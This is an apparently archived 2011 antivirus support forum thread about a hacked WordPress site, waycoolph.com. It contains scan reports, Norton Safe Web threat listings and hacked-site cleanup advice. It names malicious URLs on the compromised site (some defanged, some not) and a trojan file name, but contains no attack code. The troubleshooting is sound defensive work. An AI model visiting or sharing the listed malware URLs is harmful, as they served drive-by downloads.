I have already sent e-mail to avast! but still haven’t received any reply or resolution.
My site is: http://waycoolph.com
Would appreciate any feedback as to when this can be resolved.
I have already sent e-mail to avast! but still haven’t received any reply or resolution.
My site is: http://waycoolph.com
Would appreciate any feedback as to when this can be resolved.
Report 2011-03-25 03:14:14 (GMT 1)
Website waycoolph.com
Domain Hash 05a7d0a700e79d75c600a34c82b3951d
IP Address 75.127.114.52 [SCAN]
IP Hostname rs2.abstractdns.com
IP Country US (United States)
AS Number 16626
AS Name GNAXNET-AS - Global Net Access, LLC
Detections 3 / 21 (14 %)
Status DANGEROUS
Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender DETECTED
Scanning site with: DNS-BH CLEAN
Scanning site with: DShield SDL CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts UNRATED
Scanning site with: joewein.de LLC CLEAN
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT DETECTED
Scanning site with: Norton SafeWeb DETECTED
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SCUMWARE CLEAN
Scanning site with: SpamhausDBL CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
Norton safe Web http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwaycoolph.com
and downloaded malware found at those location indicated by Norton
PIC6757624499074533-JPG-www.facebook.com.exe
http://www.virustotal.com/file-scan/report.html?id=de06cdd4a3d579f05a0fb075b2216910eed3709a01672be68265ca2781d4b6ea-1301017964
So as i see it, avast detection / blocking is correct
Nothing evident on http://www.selfseo.com/html_source_view.php
Seems a false positive…
Sorry… Still detected… What could it be?
Anything I can do to resolve this issue?
Report that you believe this to be a false positive detection by the Network Shield and ask for them to review the site again. Though the network shield malicious sites list is usually correct and given the other detections is it possible that your site has been hacked or had previously been subject to attack, etc.
Check the links shown in the Norton safe Web link that Pondus gave and see if those urls “waycoolph.com/imagesne.php, etc.” exist.
A link to this topic might help.
I just deleted waycoolph.com/imagesne.php and an image file. Will that resolve the issue or will I still need to email avast!?
At first, I could not login via ftp because of incorrect password. However, I did not make any password any changes. I emailed the web host and they checked and said that there were no password changes done nor was there any hacking detected. Anyway, I changed the password and downloaded the php file and a jpeg file. The php file did not show any alert when I scanned via avast! but the image file did. I just deleted both files.
Status: Site still blocked even if php and jpg file was deleted.
Hello,
this site is still infected. problem is in hxxp://waycoolph.com/images771.exe?=fdgfdgh.
Best Regards
images771.exe - 19/43
http://www.virustotal.com/file-scan/report.html?id=542fc00f4384ed8bba7537f676162ba371f5005f672d572bc454da2e72cc0edb-1301043796
You are going to have to dig deeper as it is pretty clear that your site has been hacked otherwise how could this “waycoolph.com/imagesne.php, etc.” have been placed there and the later infected file mentioned by Sirmer (from avast! Virus Labs team). Simply removing the infected files we mentioned, is a short term thing as it doesn’t resolve the underlying problem of how your site was hacked, see #### below.
I think you are going to have to let your host know that the site has probably been hacked, so at the very least you should change your administrative and ftp passwords to something a little stronger.
Hacked Sites - This is commonly down to old content management software being vulnerable, PHP, Joomla, Wordpress, SQL, etc. etc. see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.I suggest the following clean up procedure for both your accounts:
check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
“default.cfm” pages as those are popular targets too.Remove any “rogue” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.Check all .htaccess files, as hackers like to load re-directs into them.
Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
“strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.
Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
Hi waycoolph,
You will get a lot of info from the free sucuri scan. Go to http://sitecheck.sucuri.net/scanner/#
Site is blacklisted by Norton Safe Web as well,
Vulnerable is your Wordpress theme: htxp://waycoolph.com/wp-content/themes/default/
Wordpress internal path: /home/waycoolp/public_html/wp-content/themes/default/index.php
Wordpress internal path: /home/waycoolp/public_html/wp-content/themes/default/index.php
Wordpress version outdated: Upgrade required.
Threat report Norton Safe Web:
Total threats found: 6
Drive-By Downloads
Threats found: 5
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=safdsdfgfdgfg
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=d?=56768768678
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: hxtp://waycoolph.com/imagesne.php?=j?=5tr4ytry
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=
Threat Name: HTTP Malicious Toolkit Variant Activity 12
Location: htxp://waycoolph.com/imagesne.php?=y5et6wt
Viruse
Threats found: 1
Threat Name: Trojan.ADH.2
Location: htxp://waycoolph.com/imagesne.php
Your site was hacked with malicious software that has been intentionally mutated or morphed by attackers, and then hackers attempted to download exploits from a malicious toolkit which may compromise a computer through various vendor vulnerarabilities,
polonus
Thanks for your help guys. I will try to follow the tips you have provided and see if I can resolve this problem of mine. Will post an update as soon as I can.
You’re welcome, good hunting.